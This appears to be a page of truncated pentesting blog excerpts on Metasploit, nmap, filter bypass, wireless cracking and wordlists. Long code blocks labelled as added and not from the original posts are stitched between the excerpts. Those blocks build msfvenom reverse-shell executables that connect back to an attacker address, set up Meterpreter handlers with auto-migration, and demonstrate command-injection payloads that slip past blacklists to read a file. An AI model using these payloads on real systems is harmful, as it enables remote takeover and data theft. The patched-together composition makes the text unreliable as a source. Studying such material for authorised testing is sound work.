Posts by JollyFrogs

Kali - msfconsole (Metasploit)

Start a Meterpreter listener from the command line for a Linux target.
Start a Meterpreter listener from the command line for a Windows target.
Tips: use "set AutoRunScript post/windows/manage/migrate" to auto-migrate into another process as soon as the session opens. Use "set ReverseListenerBindAddress 10.1.1.10" to force the listener to bind to a particular IP. This can be handy for exploits that target 127.0.0.1, [..]

Kali - msfvenom

Attacker = 10.1.1.10, Target = 10.1.1.200
Create a Windows reverse shell executable for a netcat listener.
Create a Windows reverse shell executable for a Meterpreter listener.
Create a Linux reverse shell executable for a netcat listener.
Create a Linux reverse shell executable for a Meterpreter listener.
Create a reverse [..]
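The two posts above (listener in msfconsole, executable from msfvenom) only work together when the payload baked into the executable is the one the listener expects. The example below is added here and is not code from the original posts: it derives both command lines from a single payload choice, using the page's attacker address 10.1.1.10. The port 4444, the output file names and the function names are assumptions of this example. The one check it enforces is the staged/non-staged distinction: a netcat listener only works with a single (inline) payload such as shell_reverse_tcp, while a staged payload such as meterpreter/reverse_tcp needs exploit/multi/handler to deliver the stage.

```shell
# Added example, not from the original posts: build the msfvenom command and the
# matching listener from one payload choice so the two cannot disagree.
# Assumptions: attacker 10.1.1.10 (from the page), port 4444, file names rev.exe/rev.elf.
LHOST=10.1.1.10
LPORT=4444

# payload_for <windows|linux> <nc|meterpreter>
payload_for() {
  case "$1/$2" in
    windows/nc)          echo windows/shell_reverse_tcp ;;
    windows/meterpreter) echo windows/meterpreter/reverse_tcp ;;
    linux/nc)            echo linux/x86/shell_reverse_tcp ;;
    linux/meterpreter)   echo linux/x86/meterpreter/reverse_tcp ;;
    *) echo "unknown target/listener: $1/$2" >&2; return 1 ;;
  esac
}

# is_staged <payload>: a staged payload's last path component is only the stager
# (reverse_tcp, bind_tcp). It connects back expecting multi/handler to send the
# real stage, so a plain nc listener would receive a few bytes and then hang.
# Single payloads (shell_reverse_tcp, meterpreter_reverse_tcp) carry everything.
is_staged() {
  case "${1##*/}" in
    reverse_*|bind_*) return 0 ;;
    *) return 1 ;;
  esac
}

# venom_cmd <os> <listener>: the msfvenom line that builds the executable
venom_cmd() {
  vp=$(payload_for "$1" "$2") || return 1
  case "$1" in
    windows) vfmt=exe; vout=rev.exe ;;
    linux)   vfmt=elf; vout=rev.elf ;;
  esac
  echo "msfvenom -p $vp LHOST=$LHOST LPORT=$LPORT -f $vfmt -o $vout"
}

# listener_cmd <os> <listener>: nc for single payloads, multi/handler for staged
# ones. ReverseListenerBindAddress pins the bind address as in the tips above;
# AutoRunScript migrates a Windows Meterpreter session automatically.
listener_cmd() {
  lp=$(payload_for "$1" "$2") || return 1
  if is_staged "$lp"; then
    extra=""
    [ "$1" = windows ] && extra="set AutoRunScript post/windows/manage/migrate; "
    echo "msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD $lp; set LHOST $LHOST; set LPORT $LPORT; set ReverseListenerBindAddress $LHOST; ${extra}exploit -j'"
  else
    echo "nc -nlvp $LPORT"
  fi
}

# Show all four combinations from the posts above.
for os in windows linux; do
  for l in nc meterpreter; do
    echo "# $os / $l listener"
    venom_cmd "$os" "$l"
    listener_cmd "$os" "$l"
  done
done
```

The generated msfconsole line can be pasted as-is, or its `-x` argument written one command per line into a resource file and started with `msfconsole -r handler.rc`.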

NMAP

TCP scan a single host (on a LAN this takes about 60 seconds, over a fast VPN it can take 5 minutes).
UDP scan a single host (only the top 200 ports, otherwise it is very slow!).
Run an intensive scan on the open ports. Scan TCP and UDP separately to speed up the [..]
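The workflow above is a quick discovery scan followed by an intensive scan limited to the ports that were actually open. The glue step is extracting the open ports from the first scan; the example below is added here and is not code from the original post. It parses nmap's grepable output (`-oG`), keeps `open` TCP ports and `open` or `open|filtered` UDP ports (UDP rarely resolves beyond `open|filtered` without service probes), and builds the follow-up commands. The `.gnmap` content is constructed inline for the demonstration; the function names and the `tcp_detail`/`udp_detail` output prefixes are assumptions of this example.

```shell
# Added example, not from the original post. Discovery scans it assumes were run:
#   nmap -sS -p- -oG tcp.gnmap 10.1.1.200            # all TCP ports
#   nmap -sU --top-ports 200 -oG udp.gnmap 10.1.1.200 # top 200 UDP ports
# Constructed sample of nmap -oG output (tab separated), standing in for those files:
SAMPLE_GNMAP=$(mktemp)
printf '%s\t%s\n' \
  'Host: 10.1.1.200 ()' 'Status: Up' \
  'Host: 10.1.1.200 ()' 'Ports: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//Apache httpd/, 111/closed/tcp//rpcbind///, 445/open/tcp//microsoft-ds///' \
  'Host: 10.1.1.200 ()' 'Ports: 53/closed/udp//domain///, 161/open/udp//snmp///, 500/open|filtered/udp//isakmp///' \
  > "$SAMPLE_GNMAP"

# open_ports <gnmap file> <tcp|udp>
# Each -oG port entry is port/state/protocol/owner/service/rpcinfo/version/;
# entries are separated by ", ". Prints a comma list suitable for nmap -p.
open_ports() {
  awk -F'\t' -v proto="$2" '
    /^Host:/ {
      for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) {
        n = split(substr($i, 8), entries, /, */)
        for (j = 1; j <= n; j++) {
          split(entries[j], f, "/")
          if (f[3] != proto) continue
          if (f[2] == "open" || (proto == "udp" && f[2] == "open|filtered"))
            out = out (out == "" ? "" : ",") f[1]
        }
      }
    }
    END { print out }' "$1"
}

# followup_scan <target> <port list> <tcp|udp>: the intensive scan on just those
# ports (version detection plus default scripts), TCP and UDP kept separate as
# the post recommends.
followup_scan() {
  [ -n "$2" ] || { echo "no open $3 ports to scan on $1" >&2; return 1; }
  case "$3" in
    tcp) echo "nmap -sS -sV -sC -p $2 -oA tcp_detail $1" ;;
    udp) echo "nmap -sU -sV -sC -p $2 -oA udp_detail $1" ;;
    *)   echo "protocol must be tcp or udp" >&2; return 1 ;;
  esac
}

TCP_PORTS=$(open_ports "$SAMPLE_GNMAP" tcp)
UDP_PORTS=$(open_ports "$SAMPLE_GNMAP" udp)
followup_scan 10.1.1.200 "$TCP_PORTS" tcp
followup_scan 10.1.1.200 "$UDP_PORTS" udp
```

Against real files the two `open_ports` calls take `tcp.gnmap` and `udp.gnmap` respectively; the same parser works on a multi-host sweep, since it accumulates ports across every `Host:` line it sees.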

Bypassing filters

Linux bash commands.
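The bash tricks this post collects are all answers to the same problem: an application passes attacker-controlled text to a shell after a blacklist has removed spaces or known command names, and the shell's own expansion rules can be used to spell the forbidden command without the forbidden characters. The example below is added here and is not the post's own code: the blacklist, the secret file and the three payloads are constructed for the demonstration, and `${IFS}` is the real mechanism (an unquoted expansion of the field separator is itself split into separate words). An allowlist is shown alongside it; the only solid fix is not to hand user input to a shell at all.

```shell
# Added example, not from the original post: why a blacklist on shell metacharacters
# fails against command injection. Everything below is constructed for the demo.
SECRET_FILE=$(mktemp)
echo top-secret > "$SECRET_FILE"

# The kind of blacklist a web application might apply before building a command:
# rejects (returns 1) anything containing a space or the word "cat".
naive_filter() {
  case "$1" in
    *' '*|*cat*) return 1 ;;
    *) return 0 ;;
  esac
}

# An allowlist: only letters, digits, dot, underscore and dash get through.
allowlist_filter() {
  case "$1" in
    ''|*[!A-Za-z0-9._-]*) return 1 ;;
    *) return 0 ;;
  esac
}

# What the vulnerable application does with the string: hand it to a shell.
run_in_shell() { eval "$1"; }

# try_payload <filter function> <payload>: prints the command's output if the
# filter lets the payload through, or "blocked".
try_payload() {
  if "$1" "$2"; then run_in_shell "$2"; else echo blocked; fi
}

# Three ways to spell "cat <file>" with neither a space nor the substring "cat".
# ${IFS} expands unquoted to space/tab/newline and is then word-split, so it
# separates arguments exactly like a typed space would.
P_QUOTES="c''at\${IFS}$SECRET_FILE"                         # empty quotes break up the keyword
P_BACKSLASH="c\\at\${IFS}$SECRET_FILE"                      # c\at is read as cat, but does not match "cat"
P_OCTAL="\$(printf\${IFS}'\\143at')\${IFS}$SECRET_FILE"      # printf '\143at' prints "cat" (octal 143 = c)

echo "plain command : $(try_payload naive_filter "cat $SECRET_FILE")"
echo "quote split   : $(try_payload naive_filter "$P_QUOTES")"
echo "backslash     : $(try_payload naive_filter "$P_BACKSLASH")"
echo "octal printf  : $(try_payload naive_filter "$P_OCTAL")"
echo "allowlisted   : $(try_payload allowlist_filter "$P_QUOTES")"
```

When you are on the other side of this and a filter strips spaces, `${IFS}` is the first thing to try; when it strips a command name, any of the three spellings above will usually survive, because the filter sees the text but the shell sees the parsed words.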

Various Tools

DBeaver - client that supports SQL, MySQL, PostgreSQL, MariaDB, SQLite, Oracle, DB2, SQL Server, Sybase, MS Access, Teradata, Firebird, Derby, etc.
Reaver - wireless WPS attack tool
PixieWPS - wireless WPS offline cracker (exploits weak entropy)

Wireless hacking

WEP - brute-force key recovery.
Keep aireplay-ng running in the background while we start to
With aireplay-ng running, start cracking the WEP key.
WPA2 - crack using a wordlist.
With airodump-ng running in another terminal
Keep replaying until you have captured the handshake [..]

Useful Commands - Windows

Use winexe to execute a command on Windows remotely.

Create customized wordlist

Create a wordlist containing words of length 1 to 6 using the characters 0-9 and A-F.
Create a wordlist containing words of length 4 using mixed alphanumeric characters.
Say you want to create a wordlist with a length of 8 with the following characteristics: [Capital Letter] [2 [..]
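The recipes above are crunch invocations. The example below is added here and is not the post's own code: it is a pure-awk stand-in for the same three jobs, for a box where crunch is not installed, and it generalises the third recipe to any crunch-style `-t` pattern rather than the one length-8 shape the post starts to describe. The crunch command lines it mirrors are given in the comments; the function names are assumptions of this example, and the character-class letters follow crunch's convention (`,` upper case, `@` lower case, `%` digit).

```shell
# Added example, not from the original post: crunch-style wordlist generation in awk.

# gen_wordlist <min length> <max length> <charset>
# crunch equivalent: crunch 1 6 0123456789ABCDEF -o hex.txt
# and, for the second recipe: crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha-numeric -o mixed.txt
gen_wordlist() {
  awk -v min="$1" -v max="$2" -v cs="$3" '
    function rec(prefix, depth,   i) {
      if (depth >= min) print prefix
      if (depth >= max) return
      for (i = 1; i <= n; i++) rec(prefix substr(cs, i, 1), depth + 1)
    }
    BEGIN {
      n = length(cs)
      if (min > max || n == 0) exit 1
      rec("", 0)
    }'
}

# gen_pattern <pattern>: every position is expanded from its class, so a
# pattern of length 8 yields words of length 8 with exactly that structure.
#   ,  upper-case letter   @  lower-case letter   %  digit   anything else  literal
# crunch equivalent for ",@@@%%%%": crunch 8 8 -t ,@@@%%%% -o list.txt
gen_pattern() {
  awk -v pat="$1" '
    function rec(prefix, pos,   c, set, i) {
      if (pos > length(pat)) { print prefix; return }
      c = substr(pat, pos, 1)
      set = (c == ",") ? upper : (c == "@") ? lower : (c == "%") ? digit : c
      for (i = 1; i <= length(set); i++) rec(prefix substr(set, i, 1), pos + 1)
    }
    BEGIN {
      upper = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
      lower = "abcdefghijklmnopqrstuvwxyz"
      digit = "0123456789"
      rec("", 1)
    }'
}

# count_words <cmd...>: size of a list before writing it to disk, so you notice
# a 16^6 hex list (16,777,216 lines) before it fills the drive.
count_words() { "$@" | wc -l | tr -d ' '; }

MIXALNUM=abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
echo "hex 1..6 words: $(count_words gen_wordlist 1 6 0123456789ABCDEF)"
echo "first pattern words:"; gen_pattern ',@%' | head -n 3
echo "mixed alnum length 2: $(count_words gen_wordlist 2 2 "$MIXALNUM")"
```

For the real length-4 mixed-alphanumeric list use `gen_wordlist 4 4 "$MIXALNUM" > mixed.txt`; it is 62^4 = 14,776,336 lines, which is why the count step is worth running first.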

tcpdump examples

Capture packets with host 20.20.20.20 and port 110 and write them to a file.
Capture ICMP ping requests.
Capture ICMP ping replies.
Capture packets with DSCP tags.
Dump HTTP traffic in ASCII and hex format.
Grab the user agent from the HTTP header on port 9999 [..]